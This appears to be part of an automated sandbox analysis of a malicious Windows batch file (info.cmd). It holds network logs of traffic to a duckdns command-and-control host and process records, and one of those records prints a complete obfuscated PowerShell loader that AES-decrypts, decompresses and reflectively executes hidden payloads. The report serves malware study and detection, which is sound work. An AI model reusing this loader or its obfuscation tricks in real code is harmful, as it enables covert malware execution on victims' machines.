                              May 23, 2024 21:10:27.209532976 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:27.264590025 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:27.310131073 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:27.315012932 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:27.500720024 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:27.506644964 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:27.559436083 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:27.564400911 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:28.056833982 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:28.061739922 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:28.399739981 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:28.406732082 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:29.193239927 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:29.198187113 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:29.276063919 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:29.282537937 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:29.410434008 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:29.415255070 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:29.479253054 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:29.484128952 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:35.538870096 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:10:35.544225931 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:10:38.423813105 CEST497052905192.168.2.8163.172.59.233

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              May 23, 2024 21:07:31.580298901 CEST5290953192.168.2.81.1.1.1
                              May 23, 2024 21:07:31.720669031 CEST53529091.1.1.1192.168.2.8

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              May 23, 2024 21:07:31.580298901 CEST192.168.2.81.1.1.10x3f85Standard query (0)newremisco2905.duckdns.orgA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              May 23, 2024 21:07:31.720669031 CEST1.1.1.1192.168.2.80x3f85No error (0)newremisco2905.duckdns.org163.172.59.233A (IP address)IN (0x0001)false

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:15:07:19
                              Start date:23/05/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\info.cmd" "
                              Imagebase:0x7ff728770000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:1
                              Start time:15:07:19
                              Start date:23/05/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6ee680000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:3
                              Start time:15:07:19
                              Start date:23/05/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c "set __=^&rem"
                              Imagebase:0x7ff728770000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:4
                              Start time:15:07:20
                              Start date:23/05/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kFkMa+H0Xjazq+yg0jtHMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $liFcl=New-Object System.IO.MemoryStream(,$param_var); $YKPPP=New-Object System.IO.MemoryStream; $DrFOQ=New-Object System.IO.Compression.GZipStream($liFcl, [IO.Compression.CompressionMode]::Decompress); $DrFOQ.CopyTo($YKPPP); $DrFOQ.Dispose(); $liFcl.Dispose(); $YKPPP.Dispose(); $YKPPP.ToArray();}function execute_function($param_var,$param2_var){ $aGqbX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rErds=$aGqbX.EntryPoint; $rErds.Invoke($null, $param2_var);}$UsDBW = 'C:\Users\user\Desktop\info.cmd';$host.UI.RawUI.WindowTitle = $UsDBW;$rybfn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UsDBW).Split([Environment]::NewLine);foreach ($bSMhM in $rybfn) { if ($bSMhM.StartsWith('WUgLizIwoCqVFjuaxzXG')) { $FYrof=$bSMhM.Substring(20); break; }}$payloads_var=[string[]]$FYrof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                              Imagebase:0x7ff728770000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:5
                              Start time:15:07:20
                              Start date:23/05/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
                              Imagebase:0x7ff6cb6b0000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:12
                              Start time:15:10:28
                              Start date:23/05/2024
                              Path:C:\Windows\System32\wermgr.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5536" "1456" "1404" "1220" "0" "0" "1504" "0" "0" "0" "0" "0"
                              Imagebase:0x7ff61d450000
                              File size:229'728 bytes
                              MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Disassembly

                              No disassembly